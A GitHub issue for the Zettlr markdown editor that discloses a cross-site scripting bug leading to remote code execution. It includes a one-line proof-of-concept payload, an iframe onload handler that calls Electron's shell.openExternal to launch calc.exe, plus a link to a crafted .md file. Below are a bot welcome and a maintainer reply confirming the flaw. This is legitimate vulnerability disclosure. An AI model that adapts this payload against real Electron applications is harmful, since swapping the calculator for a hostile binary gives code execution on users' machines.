Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-site scripting leads to Remote Code Execution #1716

Closed
soulfoodisgood opened this issue Feb 5, 2021 · 2 comments
Closed

Cross-site scripting leads to Remote Code Execution #1716

soulfoodisgood opened this issue Feb 5, 2021 · 2 comments
Labels
bug A bug that affects the functionality of Zettlr. confirmed At least two users and/or the developers confirmed this issue. pinned Indicates this issue should not be automatically handled by the bots. priority:high This issue has high priority and should be implemented asap. security Pull requests that address a security vulnerability
Projects

Comments

@soulfoodisgood
Copy link

soulfoodisgood commented Feb 5, 2021

Description

XSS leads to remote code execution

Reproducing

  1. Download the crafted .md file (https://drive.google.com/file/d/1j9p1bL75ezWIIRbg0hb65-02jIt2u8OX/view?usp=sharing)
    Or make the md file by yourself. Foo.md content:
    <iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>
  2. Open the file with Zettlr 1.8.7Windows Version
  3. Once the page refresh or you can click anywhere for refreshing, calculator pops up.

擷取

Expected behaviour

XSS payload shouldn't execute
Set nodeIntregration as false

Platform

  • OS and version: Windows 10 x64
  • Zettlr Version: 1.8.7

Additional information

@boring-cyborg
Copy link

boring-cyborg bot commented Feb 5, 2021

Thanks so much for opening up your first issue here on the repository! 🎉 We would like to warmly welcome you to the community behind the app! ☺️ We'll check in soon and have a look at your issue. In the meantime, you can check your issue and make sure it aligns with our contribution guidelines! Here's the comprehensive list:

Enhancements

An enhancement takes a feature and improves or alters its behaviour. Please make sure to argue how your proposition will aid non-technical text workers, and why it can't be emulated easily with other features or apps!

Feature requests

Feature requests introduce whole new features into the app. This requires a lot of work, so these might be turned down if the implementation costs supersede the benefits we expect to see from implementing it. Please do not be disappointed if that happens. It likely has nothing to do with your great request but simply with us and our missing resources!
You can of course always ask someone to implement this feature, because a PR with a working new feature has much higher chances of being merged! :)

Bug reports

Please note that one of the main reasons for why bug reports cannot be addressed is that there's not enough information for us to find and fix the bug you describe, so make sure you try to pinpoint the bug as close as possible.
The ideal bug report for us has two qualities:

  1. The bug is always reproducible, at least within a certain context. 2. We know exactly what specifically goes wrong, and there is consensus on
    what should happen instead.

Please note that if you encounter behaviour that does not align with your expectations of what would happen, this might as well be simply intended behaviour and we need to simply clarify why the behaviour is the way it is. This is not to be considered a bug and such issues may be closed! Suggest an enhancement instead!
But now, have a great day and thank you again!

@nathanlesage
Copy link
Member

Absolutely true, Abricotine worked around this using a whitelist of pages. I have to implement something similar.

@nathanlesage nathanlesage added bug A bug that affects the functionality of Zettlr. confirmed At least two users and/or the developers confirmed this issue. pinned Indicates this issue should not be automatically handled by the bots. priority:high This issue has high priority and should be implemented asap. labels Feb 8, 2021
@nathanlesage nathanlesage added this to To do in Zettlr 2.x via automation Feb 8, 2021
@nathanlesage nathanlesage added the security Pull requests that address a security vulnerability label Feb 8, 2021
Zettlr 2.x automation moved this from To do to Done Apr 21, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug A bug that affects the functionality of Zettlr. confirmed At least two users and/or the developers confirmed this issue. pinned Indicates this issue should not be automatically handled by the bots. priority:high This issue has high priority and should be implemented asap. security Pull requests that address a security vulnerability
Projects
Zettlr 2.x
  
Done
Development

No branches or pull requests

2 participants